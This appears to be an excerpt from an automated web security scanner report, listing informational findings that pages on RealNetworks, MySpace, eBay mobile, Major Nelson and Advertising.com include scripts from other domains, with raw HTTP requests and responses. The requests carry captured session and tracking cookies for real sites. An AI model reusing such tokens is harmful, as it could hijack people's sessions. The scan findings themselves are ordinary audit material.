Cookie: __utma=93573022.725148803.1311106996.1311106996.1311106996.1; __utmb=93573022.2.10.1311106996; __utmc=93573022; __utmz=93573022.1311106996.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NOMOBILE=0; sifrFetch=true; RNWK_SESSION=1329163465%7C%20%7Bts%20%272011%2D07%2D19%2016%3A25%3A08%27%7D%7C%20%7Bts%20%272011%2D07%2D19%2016%3A25%3A13%27%7D%7C4EE9066889CE5E5F75EED0DA903AF783; RNWK_BRIEFCASE=UPDATED%7C40653%2E6841204; __utma=123436755.2082772103.1311107120.1311107120.1311107120.1; __utmb=123436755.1.10.1311107120; __utmc=123436755; __utmz=123436755.1311107120.1.1.utmcsr=realnetworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/contact-us.aspx

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 19 Jul 2011 20:27:36 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: RNWK_SESSION=1329163465%7C%20%7Bts%20%272011%2D07%2D19%2016%3A25%3A08%27%7D%7C%20%7Bts%20%272011%2D07%2D19%2016%3A27%3A35%27%7D%7C4EE9066889CE5E5F75EED0DA903AF783;domain=investor.realnetworks.com;expires=Wed, 18-Jul-2012 20:27:36 GMT;path=/
Set-Cookie: RNWK_BRIEFCASE=UPDATED%7C40653%2E6841204;domain=investor.realnetworks.com;expires=Wed, 18-Jul-2012 20:27:36 GMT;path=/
Set-Cookie: RNWK_PREVIEW=;expires=Mon, 19-Jul-2010 20:27:36 GMT;path=/
Vary: Accept-Encoding
Content-Length: 27544


<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<me
...[SNIP]...
</script>
   <script type="text/javascript" src="http://charts.edgar-online.com/ext/charts.dll?2-4-e-0-0-512-03NA000000RNWK&fs-100-SF:1|2|5|3-BG=ffffff-BG1=ffffff-BG2=ffffff-FF:A18=e0e0e0|A33=e0e0e0-ht=240-wd=540-FT:0=6-AP:9=2|10=2-FB:1=E6E6E6-FL:2=990033-FF:2=990033-FL:3=009900-FF:3=009900-FL:1=336699-FF:1=336699-FL:18=336699-FF:18=336699-FL:5=000000-FF:5=000000-AT:9=1-FI:-IMAP=1"></script>
...[SNIP]...

21.15. http://js.myspacecdn.com/modules/common/static/js/jquery/msglobal_yu2qtsmq.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.myspacecdn.com
Path:   /modules/common/static/js/jquery/msglobal_yu2qtsmq.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /modules/common/static/js/jquery/msglobal_yu2qtsmq.js HTTP/1.1
Host: js.myspacecdn.com
Proxy-Connection: keep-alive
Referer: http://www.myspace.com/auth/loginform?dest=http%3a%2f%2fwww.myspace.com%2fModules%2fPostTo%2fPages%2fdefault.aspx%3fl%3d3%26u%3dhttp%253A%252F%252Fwww.factset.com%252Fproducts%252Fprivateequity%26t%3dPrivate%2bEquity%252C%2bVenture%2bCapital%252C%2bOwnership%252C%2bM%2526A%252C%2bIdea%2bScreening%252C%2bReporting%2b%257C%2bFactSet%2bResearch%2bSystems%26c%3d%253Cp%253EPowered%2bby%2b%253Ca%2bhref%253D%2522http%253A%252F%252Fsharethis.com%2522%253EShareThis%253C%252Fa%253E%253C%252Fp%253E
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 14 Jul 2011 17:57:26 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 345475
Cache-Control: max-age=864000
Expires: Fri, 29 Jul 2011 14:28:28 GMT
Date: Tue, 19 Jul 2011 14:28:28 GMT
Connection: close
Access-Control-Allow-Origin: *

(function(a){if(a[a.length-1]==="."){return}var c=a.split(".");var b=c.length;if(b>=2){document.domain=c[b-2]+"."+c[b-1]}})(document.domain);if(!window.onerror){try{window.onerror=function(){return !M
...[SNIP]...
</a><script defer="true" src="http://www.myspace.com/music/buttons/js"></script>
...[SNIP]...

21.16. http://majornelson.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://majornelson.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: majornelson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 19 Jul 2011 23:44:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.2
X-Pingback: http://majornelson.com/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 74962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
<link rel='canonical' href='http://majornelson.com/' />
   
   <script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js?ver=3.1.2'></script>
   <script src="//ajax.googleapis.com/ajax/libs/jqueryui/1.8.11/jquery-ui.min.js"></script>
...[SNIP]...
</h4>
   <script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

21.17. http://mobile.ebay.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mobile.ebay.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: mobile.ebay.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: npii=btpim/14e25d577^tguid/adb7b0cb1300a0aa15432be3fe5c7984500701ef^cguid/3666b2e01300a47a44d622a6ffc19372500701ef^trm/svid%3D94316858148500701ef^; ds2=asotr/b13qzzzzzLCz^; ebay=%5Elrtjs%3D0.8%5Esbf%3D%23a0000000000%5Ecos%3D9%5Ecv%3D15555%5Elvmn%3D0%7C0%7C%5Ejs%3D1%5E; dp1=bpbf/%2320000000000000000450070271^vrvi/1%7C0%7C120749940240%7C4e32fdf1^tzo/12c4e25dd01^u1p/QEBfX0BAX19AQA**50070271^idm/14e272014^; ns1=BAQAAATErF7ITAAaAANgARlAHAnFjNjZ8NTE1XjEzMDg1ODQ1NjQwMjReMF5eMF4zYTAwMjAwODhiMDZeM14yMV41MF4yXjNeMV4yXjNeMV4yMV4xXjBeMF4wOVS+7vNiAcwAgxQphZebxkn8+UI*; cssg=43ae68ff1310a02680b5d7a5ffb89bda; s=BAQAAATErF7ITAAWAAPgAIE4nIHE0M2FlNjhmZjEzMTBhMDI2ODBiNWQ3YTVmZmI4OWJkYQASAApOJyBxdGVzdENvb2tpZQFKABhOJyBxNGUyNWNlZjEuMC4xLjExLjgxLjAuMC4yFPNiJeAhFsvLL4xWqs4KDQJVMx8*; nonsession=CgAAIABxOTVvxMTMxMTEwMDUyOXgxMjA3NDk5NDAyNDB4MHgyTgDKACBXi9BxYWRiN2IwY2IxMzAwYTBhYTE1NDMyYmUzZmU1Yzc5ODQAywABTiXV+TIBTAAYUAcCcTRlMjVjZWYxLjAuMS4xMS43OC4zLjAuMpEBtrc*; lucky9=3520182; cid=A2TySNFv

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:39:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
X-Pingback: http://mobile.ebay.com/xmlrpc.php
nnCoection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83888


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>

   <
...[SNIP]...
<link rel="stylesheet" href="http://mobile.ebay.com/wp-content/themes/platformpro/style-default.css" type="text/css" media="screen" />
<script type="text/javascript" src="http://include.ebaystatic.com/js/v/us/roverlv.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3/jquery.min.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://include.ebaystatic.com/v4css/z/mp/qc5wb4ge2e2trcmywgztp4gkd.css"><script src="http://include.ebaystatic.com/v4js/z/au/tx45dfaejq4yzpsm0juafsuew.js"></script><script type="text/javascript" src="http://include.ebaystatic.com/v4js/z/uv/rpdqxmxoluycdozhqrpfbteov.js"></script>
...[SNIP]...
</div><script src="http://include.ebaystatic.com/js/e723/us/ebaybase_v4_e7231us.js"></script><script src="http://include.ebaystatic.com/js/e681/us/ebaysup_e6811us.js"></script>
...[SNIP]...

21.18. http://mobile.ebay.com/mobileweb/ebay  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mobile.ebay.com
Path:   /mobileweb/ebay

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mobileweb/ebay HTTP/1.1
Host: mobile.ebay.com
Proxy-Connection: keep-alive
Referer: http://mobile.ebay.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ns1=BAQAAATErF7ITAAaAANgARlAHAnFjNjZ8NTE1XjEzMDg1ODQ1NjQwMjReMF5eMF4zYTAwMjAwODhiMDZeM14yMV41MF4yXjNeMV4yXjNeMV4yMV4xXjBeMF4wOVS+7vNiAcwAgxQphZebxkn8+UI*; cssg=43ae68ff1310a02680b5d7a5ffb89bda; s=BAQAAATErF7ITAAWAAPgAIE4nIHE0M2FlNjhmZjEzMTBhMDI2ODBiNWQ3YTVmZmI4OWJkYQASAApOJyBxdGVzdENvb2tpZQFKABhOJyBxNGUyNWNlZjEuMC4xLjExLjgxLjAuMC4yFPNiJeAhFsvLL4xWqs4KDQJVMx8*; nonsession=CgAAIABxOTVvxMTMxMTEwMDUyOXgxMjA3NDk5NDAyNDB4MHgyTgDKACBXi9BxYWRiN2IwY2IxMzAwYTBhYTE1NDMyYmUzZmU1Yzc5ODQAywABTiXV+TIBTAAYUAcCcTRlMjVjZWYxLjAuMS4xMS43OC4zLjAuMpEBtrc*; lucky9=3520182; cid=A2TySNFv; dp1=bpbf/#20001000000000000451e83658^vrvi/1%7C0%7C120749940240%7C4e32fdf1^tzo/12c51e83641^u1p/QEBfX0BAX19AQA**50070271^idm/14e272014^; npii=btpim/14e25d577^tguid/adb7b0cb1300a0aa15432be3fe5c7984500702d0^cguid/3666b2e01300a47a44d622a6ffc19372500702d0^trm/svid%3D94316858148500702d0^; ebay=%5Elrtjs%3D0.8%5Esbf%3D%23a0000100000%5Ecos%3D9%5Ecv%3D15555%5Elvmn%3D0%7C0%7C%5Ejs%3D1%5Edv%3D4e25cf41%5Epsi%3DAsWCSaCg*%5E; ds2=asotr/b13qzzzzzLCz^ssts/1311100804374^

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:39:57 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
X-Pingback: http://mobile.ebay.com/xmlrpc.php
nnCoection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31022


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
   <m
...[SNIP]...
<link rel="stylesheet" href="http://mobile.ebay.com/wp-content/themes/platformpro/style-default.css" type="text/css" media="screen" />

<script type="text/javascript" src="http://include.ebaystatic.com/js/v/us/roverlv.js"></script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3/jquery.min.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://include.ebaystatic.com/v4css/z/mp/qc5wb4ge2e2trcmywgztp4gkd.css"><script src="http://include.ebaystatic.com/v4js/z/au/tx45dfaejq4yzpsm0juafsuew.js"></script><script type="text/javascript" src="http://include.ebaystatic.com/v4js/z/uv/rpdqxmxoluycdozhqrpfbteov.js"></script>
...[SNIP]...
</div><script src="http://include.ebaystatic.com/js/e723/us/ebaybase_v4_e7231us.js"></script><script src="http://include.ebaystatic.com/js/e681/us/ebaysup_e6811us.js"></script>
...[SNIP]...

21.19. http://mobileweb.ebay.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mobileweb.ebay.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: mobileweb.ebay.com
Proxy-Connection: keep-alive
Referer: http://mobile.ebay.com/mobileweb/ebay
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ns1=BAQAAATErF7ITAAaAANgARlAHAnFjNjZ8NTE1XjEzMDg1ODQ1NjQwMjReMF5eMF4zYTAwMjAwODhiMDZeM14yMV41MF4yXjNeMV4yXjNeMV4yMV4xXjBeMF4wOVS+7vNiAcwAgxQphZebxkn8+UI*; cssg=43ae68ff1310a02680b5d7a5ffb89bda; s=BAQAAATErF7ITAAWAAPgAIE4nIHE0M2FlNjhmZjEzMTBhMDI2ODBiNWQ3YTVmZmI4OWJkYQASAApOJyBxdGVzdENvb2tpZQFKABhOJyBxNGUyNWNlZjEuMC4xLjExLjgxLjAuMC4yFPNiJeAhFsvLL4xWqs4KDQJVMx8*; nonsession=CgAAIABxOTVvxMTMxMTEwMDUyOXgxMjA3NDk5NDAyNDB4MHgyTgDKACBXi9BxYWRiN2IwY2IxMzAwYTBhYTE1NDMyYmUzZmU1Yzc5ODQAywABTiXV+TIBTAAYUAcCcTRlMjVjZWYxLjAuMS4xMS43OC4zLjAuMpEBtrc*; lucky9=3520182; cid=A2TySNFv; ds2=asotr/b13qzzzzzLCz^ssts/1311100804374^; npii=btpim/14e25d577^tguid/adb7b0cb1300a0aa15432be3fe5c7984500702fe^cguid/3666b2e01300a47a44d622a6ffc19372500702fe^trm/svid%3D94316858148500702fe^; dp1=bpbf/#20001000000000000451e83658^vrvi/1%7C0%7C120749940240%7C4e32fdf1^tzo/12c51e83687^u1p/QEBfX0BAX19AQA**50070271^idm/14e272014^; ebay=%5Elrtjs%3D0.8%5Esbf%3D%23a0000100000%5Ecos%3D9%5Ecv%3D15555%5Elvmn%3D0%7C0%7C%5Ejs%3D1%5Edv%3D4e25cf87%5Epsi%3DAsoIQKvY*%5E

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
RlogId: p4ndvwpfiuf%3F%3Cw%7B%28tbgfgi35%3E-13143b29c30
Cache-Control: must-revalidate, no-store, no-transform
Set-Cookie: nbuuid=e86aa901c303413980596abf8e04d882; expires=Tue, 12 Jul 2011 08:50:11 GMT; path=/; domain=.mobileweb.ebay.com
Content-Type: text/html;charset=utf-8
Content-Length: 26822
Date: Tue, 19 Jul 2011 18:40:03 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=utf-8"><META HTTP-EQUIV="
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://include.ebaystatic.com/eboxapps/ebaymobi/css/en_US/E711/SYS-MOBI_styleWebKitCss_E71113361611_en_US.css"><script src="http://include.ebaystatic.com/eboxapps/ebaymobi/js/en_US/E711/SYS-MOBI_bsfSysJs_E71113361580_1_en_US.js" type="text/javascript"></script>
...[SNIP]...

21.20. http://r1-ads.ace.advertising.com/site=808880/size=300250/u=2/bnum=14768994/hr=15/hl=5/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=0/aolexp=0/dref=http%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=808880/size=300250/u=2/bnum=14768994/hr=15/hl=5/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=0/aolexp=0/dref=http%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /site=808880/size=300250/u=2/bnum=14768994/hr=15/hl=5/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=0/aolexp=0/dref=http%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue HTTP/1.1
Host: r1-ads.ace.advertising.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228?t=1311108266616&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: ACID=gz150013044372470058; C2=9ZIJOJpwHg02Ft1BdbdRbdAmoZ0WH4fvGtFt9YA8raYrC2tBi2Uh8HbPGsOlG6PnFdw7LYQRwu/BYOpRFJ6LI4NLG/G; GUID=MTMxMDY4NDI1ODsxOjE3MGliaG4wMWNtbnEyOjM2NQ; F1=Bwthk4EBAAAABAAAAYAAeEA; BASE=RagevvmNI50lwaYGzAjLGety9H7tx6n0GOPCcMMxVO/SJzIGr4njcOMwvmlYrsF!; ROLL=2TgM2QnlNOiYjDjHBUUu5Ru+iJy9peWSGwNHI9wCApF9yfwBPXWGZfL!; aceRTB=rm%3DSat%2C%2013%20Aug%202011%2018%3A00%3A44%20GMT%7Cam%3DSat%2C%2013%20Aug%202011%2018%3A00%3A44%20GMT%7Cdc%3DSat%2C%2013%20Aug%202011%2018%3A00%3A44%20GMT%7Can%3DSat%2C%2013%20Aug%202011%2018%3A00%3A44%20GMT%7Crub%3DSat%2C%2013%20Aug%202011%2018%3A00%3A44%20GMT%7C; A07L=39VpRQiFM7Ejog5CPRr6l003MZh1efyTZJsx0cnm7dLyA8oEYfYNzwQ

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1040486.808880.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 19 Jul 2011 20:44:31 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 615
Date: Tue, 19 Jul 2011 20:44:31 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=vyeJOJpwHg02F8wBdbdBPcAmoZwDH4fvG8At9YA8raUYC2tBi2URwGbPGsOlGJLnFZw7LYM+wuvBYOpB5L6LI4NLGOCqyBwHcZAS; domain=advertising.com; expires=Thu, 18-Jul-2013 20:44:31 GMT; path=/
Set-Cookie: F1=B8K7l4EBAAAABAAAAEAAgEA; domain=advertising.com; expires=Thu, 18-Jul-2013 20:44:31 GMT; path=/
Set-Cookie: BASE=RagegvmNI50lwaYGzAjLGety9H7tx6n0GOPCcMMxVO/SJzIGr4njcOMwvmlYrsFznFYf9CM!; domain=advertising.com; expires=Thu, 18-Jul-2013 20:44:31 GMT; path=/
Set-Cookie: ROLL=2TgMxQnPNOiYeID!; domain=advertising.com; expires=Thu, 18-Jul-2013 20:44:31 GMT; path=/
Set-Cookie: 14768994=_4e25ecaf,8285755238,808880^1040486^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N2998.159462.7724395940621/B5645623.4;sz=300x250;pc=[TPAS_ID];click=http://r1-ads.ace.advertising.com/click/site=0000808880/mnum=0001040486/cstr=14768994=_4e25ecaf,8285755238,808880^1040486^1183^0,1_/xsxdata=$XSXDATA/bnum=14768994/optn=64?trg=;ord=8285755238?">');document.write('<\/SCRIPT>
...[SNIP]...

21.21. http://realnetworks.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://realnetworks.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: realnetworks.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:10:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14831


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/css/home.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.22. http://realnetworks.com/about-us/affiliate.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://realnetworks.com
Path:   /about-us/affiliate.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-us/affiliate.aspx HTTP/1.1
Host: realnetworks.com
Proxy-Connection: keep-alive
Referer: http://realnetworks.com/contact-us/realnetworks-united-states-offices.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=realnetworks.com&SiteLanguage=1033; EktGUID=db878b65-3163-4e4a-b116-f24fb5735718; EkAnalytics=db878b65-3163-4e4a-b116-f24fb5735718; ASP.NET_SessionId=1qq31f2xuab2qu55lxydhonq; sifrFetch=true; __utma=93573022.725148803.1311106996.1311106996.1311106996.1; __utmb=93573022.4.10.1311106996; __utmc=93573022; __utmz=93573022.1311106996.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:15:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16808


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_documentH
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/css/sIFR-print.css" media="print" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
...[SNIP]...

21.23. http://realnetworks.com/contact-us.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://realnetworks.com
Path:   /contact-us.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /contact-us.aspx HTTP/1.1
Host: realnetworks.com
Proxy-Connection: keep-alive
Referer: http://realnetworks.com/pressroom/index.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=realnetworks.com&SiteLanguage=1033; EktGUID=db878b65-3163-4e4a-b116-f24fb5735718; EkAnalytics=db878b65-3163-4e4a-b116-f24fb5735718; ASP.NET_SessionId=1qq31f2xuab2qu55lxydhonq; sifrFetch=true; __utma=93573022.725148803.1311106996.1311106996.1311106996.1; __utmb=93573022.1.10.1311106996; __utmc=93573022; __utmz=93573022.1311106996.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:12:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 18460


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_documentH
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/css/sIFR-print.css" media="print" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
...[SNIP]...

21.24. http://realnetworks.com/contact-us/realnetworks-united-states-offices.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://realnetworks.com
Path:   /contact-us/realnetworks-united-states-offices.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /contact-us/realnetworks-united-states-offices.aspx HTTP/1.1
Host: realnetworks.com
Proxy-Connection: keep-alive
Referer: http://realnetworks.com/contact-us.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=realnetworks.com&SiteLanguage=1033; EktGUID=db878b65-3163-4e4a-b116-f24fb5735718; EkAnalytics=db878b65-3163-4e4a-b116-f24fb5735718; ASP.NET_SessionId=1qq31f2xuab2qu55lxydhonq; sifrFetch=true; __utma=93573022.725148803.1311106996.1311106996.1311106996.1; __utmb=93573022.3.10.1311106996; __utmc=93573022; __utmz=93573022.1311106996.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:14:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
